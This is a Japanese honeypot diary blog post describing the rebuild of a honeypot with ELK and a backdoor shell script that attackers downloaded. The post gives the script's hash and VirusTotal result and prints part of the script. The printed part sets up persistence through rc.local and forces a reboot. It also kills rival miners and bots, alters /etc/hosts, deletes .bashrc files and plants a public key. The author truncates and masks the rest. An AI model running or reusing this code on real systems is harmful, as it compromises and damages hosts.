ハニーポットの観測記録

ハニーポッターすぎたむちのぶろぐ

ハニーポット観察日記【2】

はい、ずっと更新サボってました。
すいません、今後もこんな感じです。

さてさて、状況はというとこんな感じです
f:id:SugitaMuchi:20180812161822p:plain:w500 f:id:SugitaMuchi:20180812161817p:plain:w500

収集データが少ないのですが、実はサーバぶっ壊しました(故意に)

ちょっと試したいことがあったのと、
ELKを導入しようと思ったので、一度きれいにしてやりなおしました~
ですので、以前書いた記事のデータはありませんw

ELK導入は初めてやってみたので、わからないことが多すぎて苦戦しましたw
(無知すぎですねw)

とはいえ、構築後すでに攻撃が始まっております。
攻撃元やusername / passwordは上述した画像を見てもらうとして、
ダウンロードされていたファイルについて

ハッシュ(sha1)

$ sha1sum *
8afc7d3af83bb59ee0286ab2086a73f1bb386345  b33b30c3cc7e027320e4d203303cc36a4e84b44451278bbb524ec54d5f61a4d6


VirusTotalで検索してみたところ検出率: 28 / 59でBackdoor系でした。

$ file *
b33b30c3cc7e027320e4d203303cc36a4e84b44451278bbb524ec54d5f61a4d6: ASCII text, with very long lines


ちなみに、中身が読めそうでしたので、覗いてみましたw
IPアドレスとかドメインとかはマスキングしてます。

$ cat b33b30c3cc7e027320e4d203303cc36a4e84b44451278bbb524ec54d5f61a4d6
#!/bin/bash

MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then
        NEWMYSELF=`mktemp -u 'XXXXXXXX'`
        sudo cp $MYSELF /opt/$NEWMYSELF
        sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
        sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
        sudo sh -c "echo 'exit 0' >> /etc/rc.local"
        sleep 1
        sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 xxxxxxxxx.xxxxxxxxxx.com" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc

※中略

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7i

※以下略

コードが悪用されてもアレなので、省略しますが、
鍵情報が設定されているあたりからもBackdoor系って思っていいのでしょうかね。


はい。
おしまいww
内容と髪が薄くてすみませんww

今後、もう少し濃い内容を書いていけるように頑張りますw